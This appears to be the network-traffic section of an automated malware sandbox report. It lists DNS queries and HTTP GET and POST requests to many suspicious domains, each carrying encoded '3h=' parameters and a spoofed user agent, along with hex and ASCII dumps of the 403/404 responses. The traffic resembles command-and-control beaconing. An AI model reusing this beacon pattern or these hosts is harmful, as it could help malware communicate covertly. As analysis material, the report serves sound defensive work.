                Source: global trafficHTTP traffic detected: GET /3oq9/?3h=2MJNacGdKZTNHNzWrRqovynOPBr8E/IdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHm09siwkoQohFpIo7lKjiy8KvUx5E5SY/z4nc=&Ol=yN0LtN-HDTPXX HTTP/1.1Host: www.opro.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX HTTP/1.1Host: www.santillo.betAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /xmwd/?Ol=yN0LtN-HDTPXX&3h=IE+rnmKnemgDtsiA8D5STAXs+nTDk69pr8eDsUHYy7apDPgh9p40v/i3nAWVLY2hDfLFviaUsm8qLT6zg1+OTK9FmT+L4AChwwgp3/M3yzjoJwJ2lNnYZDs= HTTP/1.1Host: www.esnafus.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /cf1q/?3h=Au7Zxr9sERBgSOyq6sWX0Xm+S784fSZRk7JANtZrtFINqgeh5LGBoKKy7i8WIDLxVDqalClkjREz1X29sb2m/qDZ/T0gendGAmanUDy32Npyhfc7xsZS61c=&Ol=yN0LtN-HDTPXX HTTP/1.1Host: www.sssvip2.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /5g1j/?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX HTTP/1.1Host: www.shipley.groupAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficDNS traffic detected: DNS query: www.goldbracelet.top
                Source: global trafficDNS traffic detected: DNS query: www.pku-cs-cjw.top
                Source: global trafficDNS traffic detected: DNS query: www.ausyva4.top
                Source: global trafficDNS traffic detected: DNS query: www.969-usedcar02.shop
                Source: global trafficDNS traffic detected: DNS query: www.juewucangku.xyz
                Source: global trafficDNS traffic detected: DNS query: www.startsomething.xyz
                Source: global trafficDNS traffic detected: DNS query: www.opro.vip
                Source: global trafficDNS traffic detected: DNS query: www.santillo.bet
                Source: global trafficDNS traffic detected: DNS query: www.esnafus.online
                Source: global trafficDNS traffic detected: DNS query: www.sssvip2.shop
                Source: global trafficDNS traffic detected: DNS query: www.shipley.group
                Source: unknownHTTP traffic detected: POST /k3hn/ HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 199Connection: closeOrigin: http://www.pku-cs-cjw.topReferer: http://www.pku-cs-cjw.top/k3hn/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)Data Raw: 33 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 59 59 74 4a 4e 31 74 49 6c 58 39 39 6a 70 6f 64 70 32 42 55 7a 2b 6e 58 30 4d 79 4c 6e 62 33 33 4e 62 57 4a 42 4d 75 61 4b 64 73 4b 34 65 5a 79 2f 6a 47 49 54 6f 53 4b 78 67 55 64 55 52 56 48 7a 6b 6a 43 37 49 35 4f 72 47 45 6e 76 77 69 4e 4b 54 35 79 6f 37 6d 36 7a 74 6e 4b 7a 4a 47 49 46 51 32 55 72 34 69 42 4d 47 69 6c 61 77 43 42 78 31 33 74 4d 79 6e 59 72 6f 30 47 41 79 79 2f 54 56 39 59 62 61 42 50 49 42 74 49 76 35 4d 56 56 4d 63 35 51 6d 38 32 41 54 70 46 59 5a 39 79 77 4e 39 42 77 6e 32 75 61 48 43 30 4c 57 55 34 4d 47 59 76 32 67 3d 3d Data Ascii: 3h=Qb19kBUolZZxYYtJN1tIlX99jpodp2BUz+nX0MyLnb33NbWJBMuaKdsK4eZy/jGIToSKxgUdURVHzkjC7I5OrGEnvwiNKT5yo7m6ztnKzJGIFQ2Ur4iBMGilawCBx13tMynYro0GAyy/TV9YbaBPIBtIv5MVVMc5Qm82ATpFYZ9ywN9Bwn2uaHC0LWU4MGYv2g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Jan 2025 17:51:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vIy347nknzZsF7n8kQFEouund5xCnGKGL9963zsLW7gpdjav5t8iOyZ8SF37shEqquoe%2FXaIjn3y10t4Ff%2FUYfoZXKgmqLu8siwP97th8Rea1qbVS3VG6P8dhfoCvpPz6nxaMgtkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe83741dd843b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2262&min_rtt=2262&rtt_var=1131&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:51:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DdqZy1b9Iu0eSYQrryBoM219Yn3%2FYIQusgeGDqw%2FPThWl6z%2BL2MlvbWu2Voz7JoD%2BZA3v1TAtL0JZobUX49DdyQcC4M8GT6PHiB%2B4PF5QuZBOmFIBQsY33CQMgGpU3MpP8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe84312dc54328-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=46143&min_rtt=46143&rtt_var=23071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 31 35 38 0d 0a 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb b5 22 96 90 83 b6 a2 50 b5 e8 0a 7a 4c 9b 69 13 4c 33 25 3b db 65 ff bd 74 ed 4a 29 78 c9 cb 64 e6 7b 4c 78 ea 62 fa 7a 5f 7c 2d 66 f0 58 3c cf 61 f1 71 37 7f ba 87 cb 01 e2 d3 ac 78 40 9c 16 d3 df ce 68 98 21 ce 5e 2e 75 bf a7 9c 6c 43 ab 64 ac 56 e2 25 90 1e 67 63 78 61 81 07 ae a2 55 f8 fb a8 b0 1d e9 f7 d4 92 6d 73 d0 15 45 a1 a4 95 cb cf 09 97 6b 85 c7 76 bf 07 ef 9c 52 03 6b 4e 20 8e c0 c7 15 c7 3d 45 4f 71 45 43 b5 4c a8 fb bd 45 20 53 12 24 da 71 12 10 e7 4b d8 52 59 9a 0d 81 89 f6 c0 84 ca 52 cb af 39 04 ae 7d dc 80 8f 6b 4e 5b 23 9e 23 08 43 55 76 6e 85 33 f1 1b 1a ae 60 4f a9 81 6d b5 72 17 0a 77 87 a5 c5 2c 03 b5 97 d4 9e 56 7f bc cd 27 0a c5 1e 4b 27 b2 9b 20 d6 75 3d 34 55 d9 ec cd 78 28 bc 43 13 6e c6 d8 8d e1 11 ee 2c de 29 ed 29 9d ba 84 8a ad 6f 68 60 ea 72 10 d9 52 fe 1f 3a 35 42 a7 e0 28 1b 5d 63 96 63 9e 43 96 4f ae f3 c9 d5 ed 19 8a 7f 5f 70 09 f5 82 6b 4a 64 61 d9 c0 a7 72 49 77 a9 08 c5 8d 8f 74 12 83 c2 2e 38 3c 86 fe 03 73 57 13 32 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f158uAK1{;"PzLiL3%;etJ)xd{Lxbz_|-fX<aq7x@h!^.ulCdV%gcxaUmsEkvRkN =EOqECLE S$qKRYR9}kN[##CUvn3`Omrw,V'K' u=4Ux(Cn,))oh`rR:5B(]ccCO_pkJdarIwt.8<sW210
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:51:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJg1p2ocmgRBzQ9rbfF4RY9zgLdVYL9TVZrmJ17Zv2gCpK%2BNflZ9PdcCY4X6zXU28FlUVD%2FINT0yRmxAUSx2zdcYBcA4p43LZTjElFpUNczrget6kmxHt3o0sm%2BCZtLd3KM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe84400a37c34d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=21348&min_rtt=21348&rtt_var=10674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb 65 45 28 21 07 6d 45 a1 6a d1 2d e8 31 6d a6 4d 30 cd 94 ec 6c 97 fd f7 d2 b5 2b 45 f0 92 97 c9 cc f7 98 f0 d4 d5 ec f5 be fc 5c ce e1 b1 7c 5e c0 72 75 b7 78 ba 87 eb 11 e2 d3 bc 7c 40 9c 95 b3 9f ce 64 9c 21 ce 5f ae f5 70 a0 9c ec 43 a7 64 ac 56 e2 25 90 2e b2 02 5e 58 e0 81 eb 68 15 fe 3c 2a ec 46 86 03 b5 66 db 9e 74 43 51 28 69 e5 f2 bf 84 cb b5 c2 73 7b 38 80 77 4e a9 85 2d 27 10 47 e0 e3 86 e3 91 a2 a7 b8 a1 b1 5a 27 d4 c3 c1 32 90 a9 08 12 1d 38 09 88 f3 15 ec a9 aa cc 8e c0 44 7b 62 42 6d a9 e3 b7 1c 02 37 3e ee c0 c7 2d a7 bd 11 cf 11 84 a1 ae 7a b7 d2 99 f8 05 2d d7 70 a4 d4 c2 be de b8 2b 85 87 d3 d2 62 d6 81 ba 4b ea 4e ab 57 6f 8b a9 42 b1 e7 d2 89 1c a6 88 4d d3 8c 4d 5d b5 47 53 8c 85 0f 68 c2 6d 81 fd 18 9e e1 de e2 9d d2 91 d2 a5 4b a8 d9 fa 96 46 a6 a9 46 91 2d e5 ff a1 33 23 74 09 4e b2 c9 0d 66 39 e6 39 64 f9 f4 26 9f 16 93 3f 28 fe 7e c1 25 d4 4b 6e 28 91 85 75 0b 1f ca 25 dd a7 22 14 77 3e d2 45 0c 0a fb e0 f0 1c fa 37 4a b2 8b 95 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 161uAK1{;eE(!mEj-1mM0l+E\|^rux|@d!_pCdV%.^Xh<*FftCQ(is{8wN-'GZ'28D{bBm7>-z-p+bKNWoBMM]GShmKFF-3#tNf99d&?(~%Kn(u%"w>E7J10
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:51:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zJZRyA8oGJV%2BvpWSnvJ4DnZnyq4d8QE6LYC90EY7mXHaI5Khb039SPF1Z0PulEfbtmBL%2BOjGNNxunDkK%2BEvhLbpWU6VSU4yOHa3YCy%2FcQH8KfHG9IouIHGMSnguVW4pim8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe84507e89c330-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=22937&min_rtt=22937&rtt_var=11468&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10821&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb 65 45 28 21 07 6d 45 a1 6a d1 2d e8 31 6d a6 4d 30 cd 94 ec 6c 97 fd f7 d2 b5 2b 45 f0 92 97 c9 cc f7 98 f0 d4 d5 ec f5 be fc 5c ce e1 b1 7c 5e c0 72 75 b7 78 ba 87 eb 11 e2 d3 bc 7c 40 9c 95 b3 9f ce 64 9c 21 ce 5f ae f5 70 a0 9c ec 43 a7 64 ac 56 e2 25 90 2e b2 02 5e 58 e0 81 eb 68 15 fe 3c 2a ec 46 86 03 b5 66 db 9e 74 43 51 28 69 e5 f2 bf 84 cb b5 c2 73 7b 38 80 77 4e a9 85 2d 27 10 47 e0 e3 86 e3 91 a2 a7 b8 a1 b1 5a 27 d4 c3 c1 32 90 a9 08 12 1d 38 09 88 f3 15 ec a9 aa cc 8e c0 44 7b 62 42 6d a9 e3 b7 1c 02 37 3e ee c0 c7 2d a7 bd 11 cf 11 84 a1 ae 7a b7 d2 99 f8 05 2d d7 70 a4 d4 c2 be de b8 2b 85 87 d3 d2 62 d6 81 ba 4b ea 4e ab 57 6f 8b a9 42 b1 e7 d2 89 1c a6 88 4d d3 8c 4d 5d b5 47 53 8c 85 0f 68 c2 6d 81 fd 18 9e e1 de e2 9d d2 91 d2 a5 4b a8 d9 fa 96 46 a6 a9 46 91 2d e5 ff a1 33 23 74 09 4e b2 c9 0d 66 39 e6 39 64 f9 f4 26 9f 16 c5 1f 14 7f bf e0 12 ea 25 37 94 c8 c2 ba 85 0f e5 92 ee 53 11 8a 3b 1f e9 22 06 85 7d 70 78 0e fd 1b 8b 0b 0a b2 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 161uAK1{;eE(!mEj-1mM0l+E\|^rux|@d!_pCdV%.^Xh<*FftCQ(is{8wN-'GZ'28D{bBm7>-z-p+bKNWoBMM]GShmKFF-3#tNf99d&%7S;"}px10
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:51:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KhOXLFHlqVpL8PAE1%2B8LR6Nao0YmNvSLmm%2F%2FOJHUqvhmlBWWTz9qrg13OQ9no8zUlN797BOQTl1bIWpGfQ5FMDlOfZj0404FX%2FGMJuzg0uCAFxa%2BxtR%2FHAt9SLqMhVzbBMw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe8460be6d7cf0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 73 79 76 61 34 2e 74 6f 70 2f 61 6c 37 34 2f 3f 4f 6c 3d 79 4e 30 4c 74 4e 2d 48 44 54 50 58 58 26 61 6d 70 3b 33 68 3d 31 42 6a 73 65 34 61 61 75 43 6d 6f 39 37 4e 34 55 7a 4b 44 30 61 52 38 6d 33 36 66 43 4d 56 41 55 77 54 4a 55 36 75 36 45 2b 42 68 73 6f 66 36 55 48 78 64 79 32 52 71 62 79 52 67 74 62 74 37 67 4c 4b 50 67 68 55 38 6f 71 6e 72 34 6f Data Ascii: 2c2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4o
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:34 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ed07-1a3"
